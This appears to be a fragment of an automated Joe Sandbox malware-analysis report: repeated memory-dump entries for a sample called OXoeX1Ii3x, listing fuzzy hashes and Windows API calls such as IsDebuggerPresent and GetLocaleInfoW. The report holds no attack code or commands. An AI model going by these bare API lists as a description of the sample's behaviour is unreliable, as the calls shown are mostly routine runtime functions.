• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b54f330be523bf74fb6e165f179a1ee627a2c41003d33122c132f8584647ece6
• Instruction ID: 4fe2bc52e9e16e4ac3a4682b659fb51f24bd6de288f27e601b32af8b275b53d4
• Opcode Fuzzy Hash: b54f330be523bf74fb6e165f179a1ee627a2c41003d33122c132f8584647ece6
• Instruction Fuzzy Hash: 99022C71E012199BDF14CFA9CD906AEFBB1FF48314F258269D919E7380DB31A952CB90
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0015D3DC
• IsDebuggerPresent.KERNEL32 ref: 0015D4A8
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0015D4C1
• UnhandledExceptionFilter.KERNEL32(?), ref: 0015D4CB
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 3d1fcfa80b41c396e9b9d0f72bba604c2520f88631db0e69a08660403e288310
• Instruction ID: dbdf7aca5fa9ce5adf8eb4b1184713df41e0de4e1278311d371d8282eb31b09c
• Opcode Fuzzy Hash: 3d1fcfa80b41c396e9b9d0f72bba604c2520f88631db0e69a08660403e288310
• Instruction Fuzzy Hash: 8431F975D05218DBDF21EF64D9897CDBBB8AF18305F1041AAE40DAB250E7709B84CF45
APIs
  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00179074
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001790BE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00179184
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: InfoLocale$ErrorLast
• String ID:
• API String ID: 661929714-0
• Opcode ID: 4ad7840acaeb8e21cc7151165b9e0958c0fd74479a8d55eac3229b19dd5f9a95
• Instruction ID: 7d4050db6f1bb998a52af062a5cbf0e98e24f879a299c70c22b90b97267a96e0
• Opcode Fuzzy Hash: 4ad7840acaeb8e21cc7151165b9e0958c0fd74479a8d55eac3229b19dd5f9a95
• Instruction Fuzzy Hash: 20619771500107AFDB28DF28CD86BB677B8FF54310F2481B5E919D6682E734D999CB50
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0016B7E4
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0016B7EE
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 0016B7FB
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 324af2b0fa8fd6a9685db4c2ddee52b785117efd04988e0e4498510e5360fdfb
• Instruction ID: 9ca040c3c819e902b4af8af56009f72ff907a919e49c8194df8b528fbc62f945
• Opcode Fuzzy Hash: 324af2b0fa8fd6a9685db4c2ddee52b785117efd04988e0e4498510e5360fdfb
• Instruction Fuzzy Hash: 4731D2749012289BCB21DF28DC89B8DBBB8BF18311F5041EAE81CAB250E7709BC58F44
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,001452B9,00000000), ref: 00164EDB
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00164EFA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1518329722-0
                                                                                                                                                                                                • Opcode ID: bd0b3e89e07eeca9b8f9fb4a13a6cd81f90b5b0d36740afad4632764d8e15964
                                                                                                                                                                                                • Instruction ID: 8fb3240bd93fd3a15bd5d70a9dde052914875bac485591bc4d59d1f1e393551f
                                                                                                                                                                                                • Opcode Fuzzy Hash: bd0b3e89e07eeca9b8f9fb4a13a6cd81f90b5b0d36740afad4632764d8e15964
                                                                                                                                                                                                • Instruction Fuzzy Hash: C9F0F4B2A002147B4724DF6D8D0489EBEE9EFCA7717258299F809D7340E670CE01C790
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00172F55,00000000,00000000,00000000), ref: 00172E14
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InformationTimeZone
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 565725191-0
                                                                                                                                                                                                • Opcode ID: bea8216935bbd372777b7f29bbd0e67a97f2fde59cd6f7e6b2a159581f4fcef3
                                                                                                                                                                                                • Instruction ID: c11caf4b2a78815b8a534f5e13617815d0242cb75c26fe3fb24846c1b2f7f53a
                                                                                                                                                                                                • Opcode Fuzzy Hash: bea8216935bbd372777b7f29bbd0e67a97f2fde59cd6f7e6b2a159581f4fcef3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 73D11972E00115ABDB21AFA5DC02ABE77B9EF24710F64C056F949EB291E7709E42C790
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0017AA69,?,?,00000008,?,?,0017FA4F,00000000), ref: 0017AC9B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                                • Opcode ID: 9452d8c0b9a02e82a2e67604cf59dbda271b059ca0c97697c2a31e55dabbeb7f
                                                                                                                                                                                                • Instruction ID: 4eed5430edf566f05181ba5673944e1e4b8e9093c1cc2d1a393388c7537b52ed
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9452d8c0b9a02e82a2e67604cf59dbda271b059ca0c97697c2a31e55dabbeb7f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EB129316106089FD719CF28C48AB697BF1FF85365F69C658E89ACF2A1C335E981CB41
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0015D1F5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                                                • Opcode ID: 8fc0cb894142346a8d5fe459a33ccbb8dbee19af4b59cf90300ade098051c6e9
                                                                                                                                                                                                • Instruction ID: d7d4cc24158a388061dd2bc00dd149f809add6cb7aa8a082d88ce691186240b2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fc0cb894142346a8d5fe459a33ccbb8dbee19af4b59cf90300ade098051c6e9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 15516DB1A01205CBEB24CF59E9817AAB7F4FB48301F24846AD811EB660D7759984CB91
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                • Opcode ID: ce893491e046467159ee0688c2eb3326e073de00430873c4ae9dfa811fb9772f
                                                                                                                                                                                                • Instruction ID: 6f661b0f4e369ab81bc7aab834b0d99f0e6bb36fcd1a8c3fb156489f1a5db3a7
                                                                                                                                                                                                • Opcode Fuzzy Hash: ce893491e046467159ee0688c2eb3326e073de00430873c4ae9dfa811fb9772f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 31C111709086068ECB28DF2CCDE4A7EBBB1EF06300F540659E452E7691D331ADA5CF52
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
                                                                                                                                                                                                  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001792D4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                                                                                • Opcode ID: 411673be6726d6bd8ba279506978552b68b8510e011fdc6cc884cc918d608d09
                                                                                                                                                                                                • Instruction ID: 8d584d74c5ce6e19c1dd6457787eb5207f59f89be5e6aed4117878c87424a7e0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 411673be6726d6bd8ba279506978552b68b8510e011fdc6cc884cc918d608d09
• Instruction Fuzzy Hash: 7521C532A10206ABEF189A29DC45ABA73BCFF55314F14807AFD09D7281EB34ED48C750
APIs
• __EH_prolog3_GS.LIBCMT ref: 0015C2C1
  • Part of subcall function 0015C272: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0015C316,000000FF,00000000,0015C315,00000000,00000000,?,?,?,?,0015C316,?), ref: 0015C2A8
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: ByteCharH_prolog3_MultiWide
• String ID:
• API String ID: 1474283020-0
• Opcode ID: 83b6a51f1dddba43a7920f3ed29e83ecdc9f76023a0ecb15c96c3aadf1f3a7c6
• Instruction ID: 64c949e5f41c1e8f3341ad23c05bb6f2061e991316501c483e50848b854725d0
• Opcode Fuzzy Hash: 83b6a51f1dddba43a7920f3ed29e83ecdc9f76023a0ecb15c96c3aadf1f3a7c6
• Instruction Fuzzy Hash: C221C17294121DABCB24EBA0CC8AFCD7778AF24310F5141D5A618A7191EB70AF84CFD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID:
• String ID: ,
• API String ID: 0-3772416878
• Opcode ID: 0690b5133393a9bd872750145171cae7d18c21fcab9e141bba17ff2a3ccce9ee
• Instruction ID: d55968e29d0103291da7a7a2a77fa65b57bcec854a512854c62e8880f2d5f7af
• Opcode Fuzzy Hash: 0690b5133393a9bd872750145171cae7d18c21fcab9e141bba17ff2a3ccce9ee
• Instruction Fuzzy Hash: F0D17F71A0526A9FCB25CB688C407EDFBB0AF65300F1481EAD459B7742D7709E94CFA1
APIs
  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
• EnumSystemLocalesW.KERNEL32(00179020,00000001), ref: 00178F64
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 413837f54194b0ce1a4064ac6f6121af5ce9886d424a31425362f8ad3013b879
• Instruction ID: 318f80dd208cd02723d9dc2cacf7c7064ff860a162fc82dd0a933f3b657f50ec
• Opcode Fuzzy Hash: 413837f54194b0ce1a4064ac6f6121af5ce9886d424a31425362f8ad3013b879
• Instruction Fuzzy Hash: 301125372143019FDB18AF39C8956BAB7B2FF84328B18842DE94A87A40D771A942C740
APIs
  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0017923C,00000000,00000000,?), ref: 001794DB
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 22deb2ebb0b2186988e453b0ce9a8f010df511abdd8ac5e65da6e6bebe0c2544
• Instruction ID: d88094518977b91b3e25ce17d0b1a200ca5bbeb0325af80714f84615a30a093b
• Opcode Fuzzy Hash: 22deb2ebb0b2186988e453b0ce9a8f010df511abdd8ac5e65da6e6bebe0c2544
• Instruction Fuzzy Hash: DF01F972A54122BBDB2C5A659C0AABB7779EB40754F15C42AFC0AE3580EB30FE45C790
APIs
  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
• EnumSystemLocalesW.KERNEL32(00179280,00000001), ref: 00178FD7
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 7bf36dbb750e8d6dbe68b782ff8659c7780398f1b27e9a1cada2ed495b421610
• Instruction ID: bc63d785768e7463f9b9bcb581ef7ddf5274075f123ba6539cd2e458b1c2d6be
• Opcode Fuzzy Hash: 7bf36dbb750e8d6dbe68b782ff8659c7780398f1b27e9a1cada2ed495b421610
• Instruction Fuzzy Hash: FCF046322403046FCB146F39DC89E7ABBA6EF81728B05C02DF9498BA80CB719D01C740
APIs
  • Part of subcall function 0016E991: EnterCriticalSection.KERNEL32(?,?,0016BDC5,00000000,001977E8,0000000C,0016BD8D,?,?,001702D4,?,?,00171547,00000001,00000364,?), ref: 0016E9A0
• EnumSystemLocalesW.KERNEL32(Function_00031B70,00000001,00197AD8,0000000C,00171FA5,?), ref: 00171BB5
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 55e1df8795ea81a569070c0a880df079ec34e97532fcede8f273a0db88f8c635
• Instruction ID: 31b09ce35cc04db9af110113ab348b6b3ec0d7a916654a8e04b0961ee76c8c04
• Opcode Fuzzy Hash: 55e1df8795ea81a569070c0a880df079ec34e97532fcede8f273a0db88f8c635
• Instruction Fuzzy Hash: 33F03776A44204EFDB10EF98E846B9C7BF0EB49721F00815AF414AB2A1DB7949448F40
APIs
  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
• EnumSystemLocalesW.KERNEL32(00178E00,00000001), ref: 00178EDE
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 4dd7328080e8d66594fdc5f15f02af8f6f33b72813260af188b2c5dd489f0760
• Instruction ID: 03d6b7dbba443ce27944dc0b8e5e18de564d675ea999ad81a1ca109ee3fb06ca
• Opcode Fuzzy Hash: 4dd7328080e8d66594fdc5f15f02af8f6f33b72813260af188b2c5dd489f0760
• Instruction Fuzzy Hash: C7F0E53674020557DB149F39D84DA6ABFA4EFC1720B0A845DFA09CB691CB729943C790
APIs
  • Part of subcall function 001713A9: GetLastError.KERNEL32(00000000,00000000,00177270), ref: 001713AD
  • Part of subcall function 001713A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0017144F
• EnumSystemLocalesW.KERNEL32(00178E00,00000001), ref: 00178EDE
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 8e9318440a6c633cdbe4da1b42948de8854e520be20d27081bddb2048a3c758c
• Instruction ID: 83165781d7d80d1a976522922475f24f79119c0d74cad4e6b675e877edf61f94
• Opcode Fuzzy Hash: 8e9318440a6c633cdbe4da1b42948de8854e520be20d27081bddb2048a3c758c
• Instruction Fuzzy Hash: 43F0E53674020557CB149F39D84DA6ABFA4EFC1720B0A845DFA09CB691CB729942C790
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0016E467,?,20001004,00000000,00000002,?,?,0016DA59), ref: 001720DD
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: ef91104b56e673f56037ec0b519bac4e94d06fa3f1b1e7440812ffbba2d6cf54
• Instruction ID: db62b46c79e5c8d8f0c8f70472566e6e4d7425ea97e0ae7bac2175e7c4df7dda
• Opcode Fuzzy Hash: ef91104b56e673f56037ec0b519bac4e94d06fa3f1b1e7440812ffbba2d6cf54
• Instruction Fuzzy Hash: 82E04F31501218BBCF122FA0EC09AAE7F36EF44B51F048010FC0965222CB318E61ABA4
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001D550,0015D005), ref: 0015D53A
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
